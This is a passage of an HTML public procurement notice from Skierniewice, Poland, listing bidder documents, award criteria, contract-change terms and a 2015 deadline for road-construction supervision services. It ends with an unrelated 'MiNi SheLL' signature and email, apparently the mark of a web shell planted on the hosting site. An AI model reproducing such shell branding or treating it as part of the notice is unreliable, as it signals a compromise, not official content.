<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ,
2.Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy  Pzp - wg wzoru stanowiącego załącznik nr 2 do SIWZ,
3.Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp - wg wzoru 	stanowiącego załącznik nr 2a do SIWZ,
4. Zobowiązanie  do udostępnienia potencjału technicznego lub  osób zdolnych do należytego wykonania zamówienia- wg załącznika 3. Jeśli wykonawca nie będzie korzystał potencjału technicznego i osób wówczas w załączniku nr 3 wpisuje Nie Dotyczy, 
5.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 4,
6. Oświadczenie, że  osoby, które będą uczestniczyć w  wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wg  załącznika nr 5,
7. Wykaz wykonanych lub wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie co najmniej dwóch usług polegających na sprawowaniu nadzoru nad robotami budowlanymi polegającymi na przebudowie, rozbudowie lub budowie drogi  o wartości nie mniejszej niż 140 000,00 zł - brutto ( słownie : sto czterdzieści  tysięcy złotych), a wartość  robót budowlanych wynosiła nie mniej niż  9 000 000,00 zł (słownie: dziewięć  milionów  złotych) brutto, podobnych  z rodzaju do przedmiotu zamówienia   -  zgodnie z załącznikiem nr 6.
Za usługi podobne z rodzaju do przedmiotu zamówienia uznaje się pełnienie nadzoru inwestorskiego nad wykonaniem budowy, rozbudowy, przebudowy drogi o wartości min. 9 000 000,00 zł brutto.
8.Informację o przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp wraz z listą podmiotów należących do tej samej grupy kapitałowej, lub informację o tym, że nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 7 do SIWZ,
9. Pełnomocnictwo (gdy jest wymagane).
10. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy Pzp do oferty należy 	dołączyć dokumenty:  
	pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego,       o którym mowa w art. 23 ust. 2 ustawy Pzp,
dokumenty wymienione w punktach od 8.1.3 do 8.1.6 i 8.1.11  siwz muszą być złożone przez każdy podmiot.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie: zmiany terminu realizacji, terminów płatności, zmiany osób wskazanych do pełnienia funkcji inspektora nadzoru poszczególnych branż. Zamawiający może wyrazić zgodę na zmianę postanowień umowy pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany     terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (warunki pogodowe, odmienne od przyjętych w dokumentacji warunki terenowe, 	zwłoka lub odmowa w wydawaniu pozwoleń i uzgodnień przez odpowiednie urzędy, konieczność 	usunięcia błędów w dokumentacji projektowej). Zmiana postanowień umowy może, pod rygorem nieważności, być dokonana 	tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, Wydział Dróg i Komunikacji pok. 12 (wejście od Pl. Św. Floriana).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2015 godzina 11:30, miejsce: Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, sekretariat pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com